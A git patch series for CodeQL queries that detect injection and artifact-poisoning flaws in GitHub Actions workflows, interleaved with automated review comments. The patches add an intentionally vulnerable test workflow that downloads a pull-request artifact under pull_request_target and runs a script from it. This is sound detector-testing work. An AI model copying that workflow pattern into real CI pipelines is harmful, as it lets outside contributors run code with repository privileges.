codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index e959c7d60ca..58b7b18ca62 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
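Review bot: The reordered disjunction in `EnvPathInjectionConfig` (hunk `@@ -91,8 +86,10 @@`) has no comment explaining why `getAnEnvReachingGitHubEnvWrite` and `getAnEnvReachingGitHubOutputWrite` are flow steps in the PATH-injection configuration alongside `getAnEnvReachingGitHubPathWrite`. If only writes to `$GITHUB_PATH` matter for this query, the first two look like leftovers from the env-var and output queries and would widen the step relation. If they are intentional, a one-line comment above them should state the reason. The enclosing predicate starts outside the hunk, so this is based on the visible lines only.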
+++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -3,9 +3,6 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class OutputClobberingSink extends DataFlow::Node { } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 0cc8f913166..5e62aa675ee 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config abstract class PoisonableStep extends Step { } diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll index 0317ab28199..18a480b1cec 100644 --- a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -2,7 +2,6 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources -private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow private class SecretExfiltrationSink extends DataFlow::Node { diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 419b2ac81a9..14d36ef0fa8 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config bindingset[runner] predicate isGithubHostedRunner(string runner) { 
diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll index bbb021fe3d5..920b8ab9d20 100644 --- a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll +++ b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config class KnownVulnerableAction extends UsesStep { string vulnerable_action; diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Models/CompositeActionsSinks.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSinks.ql rename to ql/src/Models/CompositeActionsSinks.ql diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Models/CompositeActionsSources.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSources.ql rename to ql/src/Models/CompositeActionsSources.ql diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Models/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSummaries.ql rename to ql/src/Models/CompositeActionsSummaries.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Models/ReusableWorkflowsSinks.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql rename to ql/src/Models/ReusableWorkflowsSinks.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Models/ReusableWorkflowsSources.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSources.ql rename to ql/src/Models/ReusableWorkflowsSources.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Models/ReusableWorkflowsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql rename to ql/src/Models/ReusableWorkflowsSummaries.ql 
diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index 2000e2100ae..9c9c2e4d139 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.OutputClobberingQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import OutputClobberingFlow::PathGraph import codeql.actions.security.ControlChecks diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 54e013f1091..7d8a3b49009 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph +import codeql.actions.dataflow.FlowSources import codeql.actions.security.ControlChecks from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index 7ca8f4a2838..a1499764ef3 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvPathInjectionQuery +import codeql.actions.dataflow.FlowSources import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index ad97dd3caef..540edfd8b5f 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql 
@@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import EnvVarInjectionFlow::PathGraph import codeql.actions.security.ControlChecks diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 70c05fc1c95..c9af38a2c50 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink diff --git a/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/ql/test/query-tests/Models/CompositeActionsSinks.qlref index f8e1bfca630..e5cb225ed24 100644 --- a/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1 +1 @@ -Security/CWE-020/CompositeActionsSinks.ql +Models/CompositeActionsSinks.ql diff --git a/ql/test/query-tests/Models/CompositeActionsSources.qlref b/ql/test/query-tests/Models/CompositeActionsSources.qlref index dce31c31923..3b833d66912 100644 --- a/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/CompositeActionsSources.ql +Models/CompositeActionsSources.ql diff --git a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index 007941cd2f5..ea9b7a304e6 100644 --- a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/CompositeActionsSummaries.ql +Models/CompositeActionsSummaries.ql 
diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index 369befbce62..fa8344d4bf9 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSinks.ql +Models/ReusableWorkflowsSinks.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index cbea721ee34..fe4299bdba4 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSources.ql +Models/ReusableWorkflowsSources.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index ff87d53c3d6..3547c8a4d07 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSummaries.ql +Models/ReusableWorkflowsSummaries.ql diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml new file mode 100644 index 00000000000..7eaee9fa6d3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + - id: pr_number + run: | + PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT 
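Review bot: The new fixture `artifactpoisoning101.yml` triggers on `pull_request_target` but passes `github.event.workflow_run.workflow_id` and `github.event.workflow_run.id` to the download step, and that context is only populated for `workflow_run` events. As written the `with:` values would be empty at run time, so the fixture does not model a workflow that could actually fetch an artifact produced by a pull request. Either switch the trigger to `workflow_run:` or add a comment such as `# trigger/context mismatch is intentional: only the download-then-execute shape matters to the query`. A second comment noting that no `path:` is given, so the artifact is presumably extracted into the workspace where `./get_pull_request_number.sh` is then run, would make the intended finding obvious.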
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 7a59ab6ec60..5c784595dbe 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -13,6 +13,7 @@ edges | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -41,6 +42,8 @@ nodes | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -57,3 +60,4 @@ subpaths | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 2ed89bcb4bc..e6108dddd2a 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -13,6 +13,7 @@ edges | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -41,5 +42,7 @@ nodes | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 6d56b99407e..d05c7bebc07 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -3,6 +3,7 @@ | .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning101.yml:11:15:11:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 
'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6a629764adc..2a401dee18a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -53,6 +53,7 @@ edges | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:16:9:19:59 | Run Step: pr_number | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 09f1fd1a81814dd55d84f15134f302a82c6cbc34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 11:48:19 +0200 Subject: [PATCH 0590/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 82891e5c017..12cf4c6106a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.67 +version: 0.1.68 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fb4416ffb1d..b10da74b711 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.67 +version: 0.1.68 groups: [actions, queries] suites: codeql-suites extractor: javascript From b072cfa1f7ee9959ad3423926850fadf44d98a66 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 10:40:33 +0200 Subject: [PATCH 0591/1267] Add pwsh as the default shell for windows runners --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 ++++++-- .../library-tests/.github/workflows/shell.yml | 23 +++++++++++++++++++ 2 files changed, 31 insertions(+), 2 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/shell.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7c433a39e62..67ef99e0fc8 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1438,12 +1438,18 @@ class RunImpl extends StepImpl { /** Gets the shell for this `run` mapping. */ string getShell() { - if exists(n.lookup("shell").(YamlString).getValue()) + if exists(n.lookup("shell")) then result = n.lookup("shell").(YamlString).getValue() else if exists(this.getInScopeDefaultValue("run", "shell")) then result = this.getInScopeDefaultValue("run", "shell").getValue() - else result = "bash" + else + if this.getEnclosingJob().getARunsOnLabel().matches(["ubuntu%", "macos%"]) + then result = "bash" + else + if this.getEnclosingJob().getARunsOnLabel().matches("windows%") + then result = "pwsh" + else result = "bash" } ShellScriptImpl getScript() { result = scriptScalar } 
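Review bot: In `getShell()` the `ubuntu%`/`macos%` test is redundant, because every path that is not `windows%` ends in `result = "bash"`. The `windows%` pattern is also case-sensitive, so a self-hosted job labelled e.g. `[self-hosted, Windows]` would still be analysed as bash. The fallback can be collapsed to `if this.getEnclosingJob().getARunsOnLabel().toLowerCase().matches("windows%") then result = "pwsh" else result = "bash"`. Jobs whose `runs-on` is an expression such as `${{ matrix.os }}` also fall through to bash; a comment recording that limit would help, since the shell guess decides whether the bash-based sinks are applied to the script. Separately, the first condition now tests `exists(n.lookup("shell"))` while the `then` branch still casts to `YamlString`, so a non-string `shell` value yields no result instead of reaching the defaults.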
diff --git a/ql/test/library-tests/.github/workflows/shell.yml b/ql/test/library-tests/.github/workflows/shell.yml new file mode 100644 index 00000000000..9392b81c6ab --- /dev/null +++ b/ql/test/library-tests/.github/workflows/shell.yml @@ -0,0 +1,23 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + steps: + - shell: pwsh + run: Write-Output "foo" + job2: + runs-on: ubuntu-latest + steps: + - run: echo "foo" + + job3: + runs-on: windows-latest + steps: + - shell: bash + run: echo "foo" + job4: + runs-on: windows-latest + steps: + - run: Write-Output "foo" + From 6bf3eb79a9aa809bc38ead6ccf3687aaab4bdae3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 10:44:43 +0200 Subject: [PATCH 0592/1267] Add sh as a bash-compatible POSIX shell --- ql/lib/codeql/actions/Bash.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 672f7727f5b..c1e038069eb 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -4,7 +4,7 @@ class BashShellScript extends ShellScript { BashShellScript() { exists(Run run | this = run.getScript() and - run.getShell().matches("bash%") + run.getShell().matches(["bash%", "sh"]) ) } From a1047d155c1d23668072a301aecad629574e3d74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 14:48:53 +0200 Subject: [PATCH 0593/1267] Add new control checks using octokit/request-action --- ql/lib/codeql/actions/security/ControlChecks.qll | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 3b15fc78d10..760efaf5e7e 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
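Review bot: The new pattern list `["bash%", "sh"]` in `BashShellScript` matches `sh` only as an exact string, while `bash%` also accepts custom forms such as `bash -e {0}`. A step declaring `shell: sh -e {0}` would therefore still be left out of the bash script model and of whatever sinks are built on it. Consider `run.getShell().matches(["bash%", "sh", "sh %"])`. A short comment would also help, saying that `sh` scripts are handled by the same model on the assumption that the constructs the queries look for are POSIX-compatible.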
@@ -256,6 +256,9 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { or this.getCallee() = "actions/github-script" and this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%") + or + this.getCallee() = "octokit/request-action" and + this.getArgument("route").regexpMatch("GET.*(memberships).*") } } @@ -279,6 +282,9 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { or this.getCallee() = "actions/github-script" and this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%") + or + this.getCallee() = "octokit/request-action" and + this.getArgument("route").regexpMatch("GET.*(collaborators|permission).*") } } From 8323819504571d2fbfa1c83680009268f6dccafa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 15:51:00 +0200 Subject: [PATCH 0594/1267] New sources for octokit/request-action --- .../codeql/actions/dataflow/FlowSources.qll | 21 ++++++ ql/lib/codeql/actions/dataflow/TaintSteps.qll | 36 ++++++++- .../CWE-094/.github/workflows/test17.yml | 74 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++ .../CWE-094/CodeInjectionMedium.expected | 12 +++ 5 files changed, 158 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a9967a72ee6..b79a86ce27a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
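Review bot: The new `octokit/request-action` branch in `AssociationActionCheck` accepts any route matching `GET.*(memberships).*`, and the one in `PermissionActionCheck` accepts any route matching `GET.*(collaborators|permission).*`. A GET whose path or query string merely contains one of those words is therefore treated as an access check. If these classes are used to suppress alerts (not visible in the hunks), an over-broad match hides findings. Anchoring to the endpoint shape is safer, for example `this.getArgument("route").trim().regexpMatch("GET\\s+/repos/.+/collaborators/.+/permission.*")` and correspondingly `"GET\\s+/orgs/.+/memberships/.+"`. The route is also not trimmed here, unlike in `OctokitRequestActionSource`, so a route with leading whitespace is missed; both class bodies start outside their hunks.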
